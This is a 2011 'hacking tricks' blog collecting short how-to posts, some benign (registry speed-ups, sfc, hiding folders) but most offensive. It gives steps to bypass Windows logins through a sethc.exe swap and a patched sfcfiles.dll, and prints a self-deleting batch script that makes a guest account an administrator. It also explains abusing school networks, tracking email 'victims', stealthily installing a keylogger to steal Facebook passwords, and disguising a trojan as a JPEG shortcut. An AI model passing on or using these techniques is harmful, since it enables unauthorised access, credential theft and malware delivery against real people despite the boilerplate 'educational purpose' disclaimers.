Powered By Blogger

Wednesday, April 27, 2011

HACK WINDOWS XP WITHOUT CHANGE PASSCODE....

Hack Into a Windows XP Computer Without Changing PasswordThis is a featured page



Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.
There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.


Bypass Windows Login screen


Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.

2. Download DreamPackPL HERE.
3. Unzip the downloaded dreampackpl_iso.zip and you'll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press "R" to install DreamPackPL.
7. Press "C" to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)
11. Type "exit", take out disk and reboot.
12. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.

Hack Windows Login Dreamon
14. Go to commands and enable the options and enable the god command.
Bypass and hack user account passwords
15. Type "god" in the password field to get in Windows. You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password. Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.
FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

GOOGLE SEARCH ENGINE WITH YOUR NAME......

Search Google With Your NameThis is a featured page


Open This Link :-

www.goglogo.com

NOTE: PLEASE ON INTERNET SECURITY ANTIVIRUS DURING OPEN THIS SITE. FOR YOUR SAFE USE.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.
FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

CMD COMMAND BANED OR NOT ACCESS_HACK CMD COMMAND.....

Open command prompt from where it is Banned or not allowed by admin (awesome tricks)

Open up Command Prompt (Start>Run>Command.com)

Can't use command prompt at your school?

Open up Microsoft word..Type:

Command.com

Then save it as Somthing.bat.

Warning: Make sure you delete the file because if the admin finds out your in big trouble.


--Adding a user to your network--

Type:

Net user Haxxor /ADD

-----
That will add "Haxxor" onto the school user system.
-----
Now you added users lets delete them!

Type: Net user Haxxor /DELETE


Warning: Be carefull it deletes all their files.
-----
"Haxxor" will be deleted from the user system.

-----
Hmmm? It says access denied?

Thats because your not admin!

----
Now lets make your Admin!

----
This will make Haxxor an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

Type: net localgroup

It will show you what they call admin, say at my school they calll it
adminstrator so then i would

Type: net localgroup administrator Haxxor /ADD

----

Getting past your web filter.

Easy way: Type whatever you want to go on say i wanted to go on miniclips bug on wire i would go to google and search miniclip bug on wire

then instead of clicking the link i would click "cached".

Hard way: I'm hoping you still have command prompt open.

Type: ping miniclip.com

And then you should get a IP type that out in your web browser, and don't forget to put "http://" before you type the IP.

-----
Sending messages throught your school server


Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send * "The server is h4x0r3d"

Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out.

Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Haxxor School * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"

use commas to divide the names and NO SPACES between them.

or


Allowing dos and regedit in a restricted Windows



A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0

Save it as something.reg then run it. Simple.


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.
FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

TRICK TO HACK ADMIN FROM GUEST ACCOUNT.....

Much Simpler trick to HACK admin from GUESTThis is a featured page



Well thats possible ..


Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.


HaCk "GUEST" with Admin privileges........



echo off
title Please wait...
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.
FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

TRACK ANY 1_SENDING BY MAIL......

Track Anyone Just By Sending MailThis is a featured page


Well u wanna track ur victim or want to get his ip, location, browser settings, language or timings.... all u have to do is get his e-mail id...

Once u have it.

Go to www.readnotify.com

register there...

Once registered . . . send a mail to ur victim by the email id u registered at readnotify.com

But before sending the mail just add ".readnotify.com" with the victims id.. for example

xxxxx@yahoo.com.readnotify.com

and then send it...

when ever victim opens it his all the info will be mailed to u.

which can b very useful for the hackers.

Note = U can also change the settings in www.readnotify.com

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.
FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

ADMINISTRATOR_HACK_HOW????????

Hack AdministratorThis is a featured page


Here we present the rock solid windows hacks
for educational purpose only! read disclaimer before reading this article!

_____

Windows NT/2000/XP/Vista offline password editor:
http://home.eunet.no/~pnordahl/ntpasswd

This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003/Vista system, by modifying the encrypted password in the registry's SAM file.
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a floppy disk or CD. The boot-disk includes stuff to access NTFS partitions and scripts to glue the whole thing together.
Works with syskey (no need to turn it off, but you can if you have lost the key)
Will detect and offer to unlock locked or disabled user accounts!
Caution: If used on users that have EFS encrypted files, and the system is XP or later service packs on W2K, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again!
Download links:
cd070409.zip (~3MB) - Bootable CD image with newer drivers
bd050303.zip (~1.1MB) - Bootdisk image, date 050303.
sc050303.zip(~1.4MB) - SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)
To write these images to a floppy disk you'll need RawWrite2 which is included in the Bootdisk image download. To create the CD you just need to use your favorite CD burning program and burn the .ISO file to CD.


For Windows XP check out the attachment Below the comments!! It WORKS .AS IT CHANGES THE XP ADMIN PSWD WITHOUT U KNOWIN THE PREVIOUS ONE

however the "net user" and

"control userpasswords2" trick still works
: KRUNAL

You can change Administrator password from guest account without using any programs. It's easy:
1. Start-> Run, type lusrmgr.msc and hit Enter.
2. You will see window with two folders:Users and Groups. Go in the Users folder, find the Administrator, right click-> Set Password and now you can change the password without knowing the old one.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.
FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

DOWNLOAD UNLIMITED SONGS......

Hack And Download Unlimited SongsThis is a featured page


There r some websites like www.smashits.com or www.pz10.com that allow u to listen songs online but they dont allow u to download them. but now u can download any song from this website and make ur song's collection awesome.

first...download INTERNET DOWNLOAD MANAGER from this website::

http://www.internetdownloadmanager.com/

install it and u r done...!!

just go to www.smashits.com or www.pz10.com and select the song that u want to play. smashits.com 's popup window for playing song will come. dont do anything with that. within 2-3 seconds, ur INTERNET DOWNLOAD MANAGER'S window will pop-up and it will ask u for the location where u want to store this song on ur hard disk. click on START DOWNLOAD and u have that song in ur computer.


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.
FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

TRACE AND TRACK IP ADDRESS OF EMAIL SENDER........

How To Find IP Address Of An Email SenderThis is a featured page


When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding I.P Address In Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is

65.119.112.245.
That is be the IP address of the sender!
5. Track the IP address of the sender


Finding I.P Address In Yahoo Mail


1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender!
6. Track the IP address of the sender

Finding I.P Address In Hotmail

1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender

NOW U CAN TRACE IP ADDRESS OF SENDER NOW U OPEN BELOW SITE AND ENTER IP ADDRESS AND SEE LOCATION OF EMAIL SENDER.

ENJOY.....

www.ip2location.com or www.ipaddressapi.com

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.JAI HIND......

FROM:KRUNAL UPADHYAY

HACKING TRICKS_GOOGLE..........

Google Hacking TricksThis is a featured page

Everyone Wanna To Learn How To Hack The Google..But i Will Give U 100 Tricks About Google...Plz Download It Here...

Google


Download Now

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.
FIGHT AGAINST CYBER TERRORISM.
JAI HIND......

FROM:KRUNAL UPADHYAY

facebook passcode hack......

Facebook HacksThis is a featured page

Hack Facebook Password Hack Facebook PasswordWondering to know how to hack Facebook password? Well before you try to hack any Facebook password, it is necessary to understand the real ways of hacking that actually work and also those that are simply scam and don’t work. Everyday I get a lot of emails where people ask me “how to hack Facebook password?” So in this post I have taken up this topic to show you the possible ways to do that! Today even a noob computer user (perhaps like you) can easily hack Facebook or any other social networking site with ease in a matter of hours andthus hacking is no longerthe secret art of a Russian hacker!Well the idea behind this post is to expose the truth behind hacking Facebook accountso thatyou canstay away from all those scam sites which will rip off your pocketsby makingfalse promises to obtain any password for you. Also this post is not meant to encourage people into hacking Facebook, butrather it is meant to educate the Internet users to be aware of the common scams and frauds and stay away from them. With my experience of over 7 years in the field of ethical hacking and security, all I can tell you is that there are only two ways to successfully hack a Facebook account.

1. Keylogging – Easiest Way to Hack Facebook Password

Keylogging refers to simply recording each and every keystroke that is typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this programwill automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer. Some keyloggers with advanced features can also capture screenshots and monitor everyactivity on the computer. To install and use a keyloggerone doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computercan install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack Facebook password. I recommend the following keylogger as the best for gaining access to facebook password. Easily Access any Email
SniperSpy is a revolutionaryproduct that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!
Why SniperSpy is the best? Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it.It operates in complete stealth mode so that itremains undetected. Here is a summary of benefits that you will receive with Sniperspy software:

1. Access ANY Password
With SniperSpy you can hack any password and gain access to Facebook or any other online account.

2. Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats& IM conversations.

3. Never Get Caught
SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught.

4. Remote Installation Feature
With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.

5. Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.

6. Completely Safe to Use
This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.

7. Works on both Windows and Mac
Fullycompatible with Windows 2000/XP/Vista/7 and Mac. So what are you waiting for? If you are really serious to hack Facebook password then SniperSpy is for you. Go grab it now and expose the truth!

2. OtherWays to Hack Facebook Password

Theother common way to hackpasswords or online accounts is Phishing. This is the most widely used technique by many hackers to gain access toFacebook and other social networking sites. This method willmake use of a fake login page (often called as spoofeed webpage) which exactlyresemble the original one. Say for example a spoofed webpage of Facebook looks exactly same as that of the original page. This page is actually created by the hacker and is hosted on his own server. Oncean innocent victim enters his/her password in such a fake login page, the login details are stolen away by the hacker. MostInternet userswould easily fall prey toonline phishing scams.Thus phishing scams trick users so that they themselves give away their passwords. However phishing requires specialized knowledge and high level skills to implement. Thus it would not be possible for a noob user to attempt this trick.It is punishable offense too. So I wouldrecommend the use of keyloggers to hackFacebooksince it is the easiest and safest way.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.
JAI HIND......

FROM:KRUNAL UPADHYAY

SPEED UP START UP PROCESS_WINDOWS 7.......

Windows 7 speed up the start up processThis is a featured page

How to Speed up Your Windows 7 Performance
If you run a lot of applications and you think that your Windows 7 is too slow for your tastes, here is another way to speed up Windows 7 boot by enabling the Boot-Only fetching feature.
1. Click Start.
2. Go to the Search programs and files textbox, type regedit.
3. Click Regedit.exe
4. If the UAC window appears, click Yes.
5. In the registry, locate this subkey: HLKM\ SYSTEM\CurrentControlSet\ Control\SessionManager\MemoryManagement\ PrefetchParameters.
6. In the right pane, double-click EnablePrefetcher.
7. Change the value to 2 and click OK.
8. In the right pane, double-click EnableSuperfetch,.
9. Change the value to 2 and click OK.
10. Exit the registry and restart your computer for the changes to take effect.
11. Next time you turn on your computer, the prefetcher will reserve more resources to the booting process instead of booting and application launching.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.
JAI HIND......

FROM:KRUNAL UPADHYAY

Tuesday, April 26, 2011

Hacking Is Not A Crime!!!!

"Hacking" is the word that shakes everyone whenever it is said or heard by someone. Everyone born in this world with attitude wants to be a Hacker. But it is not a job of a new born baby or an old grown lady. A Hacker needs a brilliant mind to hack anything. His skills should be so powerful that no other hacker can hack him.

A Hacker doesn't need a software to hack. There are many rules that he should learn to become an Ethical Hacker. These rules include knowledge of HTML, JavaScripts, Computer Tricks, Cracking & Breaking and many more. So, don't fool around anyone saying that "I am a Hacker!".


NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

SPEEDY SHUTDOWN......HOW.....???????

Speed Up Ur Shut down !!!

Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).

NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

GET IP ADDRESS OF A WEBSITE.....

HOW TO GET THE IP ADDRESS OF A WEBSITE

Many of you guys know what IP address is and what its use in the internet is for the readers who don’t know it

So if want the IP address of a website then make use of the following tool. These are embedded in Microsoft operating system so there is no need to install any soft-ware for it.

Process on how to do it:
1) Open run and type cmd and press enter
2) Type ping website name EX: ping www.google.com
3) This gives you the IP address of the website.

Please leave a comment if you like this post

NOTE: THE AUTHOR IS NOT RESONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLE. THIS ARTICLE IS FOR EDUCATIONAL PURPOSE ONLY.
AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

HIDE FILES N FOLDER USING CMD COMMAND.......

Hide Files and Folders using Command Prompt : Trick

Hide files and foldersYou can now easily hide your files or folders through Command Prompt. It will be impossible for others to find the file or folder unless they know the filename or folder name. You can secure your documents easily by this method. Make sure you remember the file or folder name..!! :)

How To Hide Files And Folders?

We are now going to hide a folder using Command Prompt from Windows.
  • Suppose if you want to hide a folder named Aryan in your E drive.
  • Then open the Command Prompt. [ Goto Run and type cmd ]
  • Type, attrib +s +h E:\Aryan
Where
E:\ : Drive name
Aryan : Folder name
  • And If you want to make that folder appear, type,
  • attrib -s -h E:\Aryan
Use this trick and have fun.


NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

ENABLED RIGHT CLICK IN RIGHT CLICK BLOCKED WEBSITE WITH OPERA .......

Enable Right Click in Right Click Blocked Websites with Opera : Trick



Some websites use JavaScript to block the right mouse button and thus the context menu. While earlier versions of Opera had ignored such instructions, the current browser runs the JavaScript. Can this behavior be changed without deactivating JavaScript completely..??

Answer is yes....!!

Steps:
  • The options for JavaScript can be specified in detail in the new version.
  • If you do not want to allow any change in the context menu, you can ban it.
  • For that, click the new Opera button and open ‘Settings | Preferences’
  • Then switch to the ‘Advanced’ tab and select the ‘Content’ category to the left.
  • Keep the ‘Activate JavaScript’ option activated and click ‘JavaScript options’ next to it.
  • Deactivate the ‘Allow scripts to detect context menu events’ check-box.
  • Confirm the open dialog box with ‘OK’.

With the completion of these steps, you are done with the trick and you right click is now enabled.

NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

FIXE CORRUPTED FILES IN WINDOWS XP......

How to fix corrupted files in XP

(1) Introduction
(2) Required
(3) Actual Tutorial
(4) Copyright Notice
Introduction
This tutorial has been made so people that are having problems with corrupted files, can learn how to fix them easy.
Required
+ Windows XP operating system
+ Windows XP cd
Right to the tutorial
+ Place the xp cd in your cd/dvd drive
+ Go to start
+ run
+ type in 'sfc /scannow' (without the ')
Now it should all load, and fix all your corrupted file on windows XP :)

NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

FILE HIDE INTO JPEG IMAGE

Hide EXE File Into JPG Image

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..?


1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2)
Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.


5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) Inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.


NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

REMOVE TRIAL PERIOD OF SOFTWARE.......

How to Manually Bypass Trial Period of Softwares

How to Manually Bypass Trial Period of Softwares

This trick generally works for most of the 3rd party applications, here we won't use any kind of time stopper or lame stuff like that. What we will do is clear tracks so that app doesn't realize we used the software before uninstalling it and are reinstalling it.



Step 1:
First thing to do is uninstall the application.


Step 2:
Go to Start Type "Regedit".


Step 3:
Go to HK Local Machine -> Software -> Your Software name. Delete the Key.

Do this for HK Current user if there exists a key of that software.



Step 4:
Go to run type "%temp%. Delete all files. Well they are just temporary files so it won't matter, it will only clean up ur pc little bit if not anything else.


Step 5:
Go to Users -> Username -> Appdata Check all 3 directories that is "Local", "LocalLow", "Roaming" for your software entry. Delete that.


Step 6:
Reinstall application and enjoy the next trial. Just perform this everytime trial expires.


NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

HACK WINDOW ADMIN PASSCODE FROM GUEST ACCOUNT

Hack window Admin password from a guest Account without any tool



* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* Rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite,overwrite the sethc.exe
* Now log ut from your guest account and at the user select window,press shift key 5 times.
* Instead of sticky Key confirmation dialog,command prompt with full administrator privileges will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
* You will see “ The command completed successfully” and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.


NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

MAKING INVISIBLE(HIDE) FOLDER USING ASCII CODES.......

MAKING A FOLDER INVISIBLE USING ASCII - (AMERICAN STANDARD CODE FOR INFORMATION INTERCHANGE) CODES...........

WHAT ARE ASCII CODES:
AMERICAN STANDARD CODE FOR INFORMATION INTERCHANGE.


THE COMPUTER UNDERSTAND THE LANGUAGE OF 0 (ZERO) & 1(ONE) KNOWN AS BINARY CODES.
ASCII
IS A CODE FOR REPRESENTING CHARACTERS AS NUMBERS.
THE NUMBER IS THEN CONVERTED TO BINARY.
THE COMPUTER THEN INTERPRETS BINARY.

EXAMPLE

  • ASCII CODE FOR A IS 65---------> BINARY CODE FOR 65 IS 1000001
1. CHANGE FOLDER NAME WITH BLANK SPACE
2. CHANGE FOLDER ICON TO A BLANK IMAGE

RENAMING THE FOLDER
SOLUTION
CREATE FOLDER ON YOUR DESKTOP OR CREATE FOLDER IN ANY DRIVE

  1. PRESS F2 FOR RENAME FOLDER (INPUT ANY NAME FOR FOLDER)
  2. PRESS THE ALT BUTTON ON YOUR KEYBOARD
  3. CONTINUE TO HOLD DOWN THE ALT BUTTON AND TYPE 255 FROM THE NUMERIC KEYPAD.
  4. PRESS ENTER.
CHANGE THE FOLDER ICON

SOLUTION:->

  1. RIGHT CLICK ON THE FOLDER THEN CLICK ON "PROPERTIES"
  2. IN PROPERTIES, CLICK ON "CUSTOMIZE"
  3. IN CUSTOMIZE, CLICK ON "CHANGE ICON...."
  4. NOW MOVE THE SCROLL BAR TO THE RIGHT
  5. SELECT THE BLANK OPTION THEN CLICK ON OK
  6. CLICK ON APPLY & OK
THE FOLDER IS NOW INVISIBLE

REVEALING THE FOLDER

PRESS "CTRL & A" TOGETHER ON YOUR KEYBOARD
THE INVISIBLE FOLDER IS HIGHLIGHTED.


NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

PASSWORD RECOVERY FROM EXCEL......

Excel Password Recovery - Get Your Data Back !

Recovery Password From Excel

One of the basic rules of security is to protect your sensitive files by password protecting them but things don't always go as smooth when trying to re-open a file who's password you had forgotten. Ever got into a dead end situation typing countless passwords just to find yourself stranded and frustrated ? Well, I know I did and I wish I had access to fast password recovery tools like I have now.

Recently I stumbled upon Excel Password Recovery which is a very efficient tool for decrypting Excel files and also recovering lost passwords. There is a demo version available for download here which allows you to recover all passwords but imposes some limitations on the length of the recovered passwords. I have tested it and I must say that I will include it in my "never leave home without it" software collection.

Installation is pretty straightforward and once the wizard is completed, all you need to do is load the encrypted file and start the automated process of recovering your data. Next, one must chose either to:
  • to recover the document and to gain full access to all spreadsheets data ( very fast and accurate, makes use of vendor's huge computing power)
  • to recover the actual password used for encryption in order to re-use it to decrypt other files.

I chose to have immediate access to my data so I left the default checked. In the next moments, the application contacted the vendor's servers and voila, the file was unlocked and I got asked to save the decrypted version.

NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

How to Remove DLL errors?????

